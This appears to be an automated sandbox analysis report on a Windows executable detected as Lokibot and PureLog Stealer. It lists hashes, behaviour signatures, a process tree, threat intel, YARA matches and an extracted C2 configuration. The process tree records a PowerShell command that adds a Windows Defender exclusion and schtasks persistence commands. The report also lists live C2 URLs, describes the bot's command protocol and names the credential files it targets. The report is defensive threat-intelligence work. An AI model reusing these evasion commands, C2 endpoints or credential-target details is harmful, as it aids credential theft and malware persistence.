Edit tour

Windows Analysis Report
FVR-N2411-07396.exe

Overview

General Information

Sample name:	FVR-N2411-07396.exe
Analysis ID:	1564533
MD5:	2f402635e17b4f0d9c0d6922d384936a
SHA1:	2753a159f2cf160733b1ceeede1db57d2dde0375
SHA256:	bfd4e29505627b76243c4ea34c07b22af7edc00391b112e78c2dc3cf7a48d742
Tags:	exeLokiuser-abuse_ch
Infos:

Detection

Lokibot, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

FVR-N2411-07396.exe (PID: 2668 cmdline: "C:\Users\user\Desktop\FVR-N2411-07396.exe" MD5: 2F402635E17B4F0D9C0D6922D384936A)

powershell.exe (PID: 6420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6388 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 1124 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

FVR-N2411-07396.exe (PID: 1496 cmdline: "C:\Users\user\Desktop\FVR-N2411-07396.exe" MD5: 2F402635E17B4F0D9C0D6922D384936A)

ZeJFfrYmOnJKS.exe (PID: 1436 cmdline: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe MD5: 2F402635E17B4F0D9C0D6922D384936A)

schtasks.exe (PID: 5516 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ZeJFfrYmOnJKS.exe (PID: 6400 cmdline: "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe" MD5: 2F402635E17B4F0D9C0D6922D384936A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/soja/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3255881950.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x308b8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x1dc83:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2c4c7:$des3: 68 03 66 00 00 0x308b8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x30984:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.2071531160.0000000005540000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x26408:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x137bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x21fff:$des3: 68 03 66 00 00 0x26408:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x264d4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x19dde8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x18b1b3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1999f7:$des3: 68 03 66 00 00 0x19dde8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x19deb4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.2053219827.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2130538149.00000000028CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x7a1d0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x67583:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x75dc7:$des3: 68 03 66 00 00 0x7a1d0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x7a29c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: FVR-N2411-07396.exe PID: 2668	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: FVR-N2411-07396.exe PID: 2668	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: FVR-N2411-07396.exe PID: 2668	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: FVR-N2411-07396.exe PID: 2668	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x80c4:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x26152:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x41fd6:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: FVR-N2411-07396.exe PID: 1496	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1eca2:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: ZeJFfrYmOnJKS.exe PID: 6400	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: ZeJFfrYmOnJKS.exe PID: 6400	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: ZeJFfrYmOnJKS.exe PID: 6400	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3bad:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 43 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.FVR-N2411-07396.exe.2a7de7c.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FVR-N2411-07396.exe.5540000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.FVR-N2411-07396.exe.2a6ddb0.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.FVR-N2411-07396.exe.3a024c8.5.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.FVR-N2411-07396.exe.3a024c8.5.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.FVR-N2411-07396.exe.3a024c8.5.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.FVR-N2411-07396.exe.3a024c8.5.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.FVR-N2411-07396.exe.3a024c8.5.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
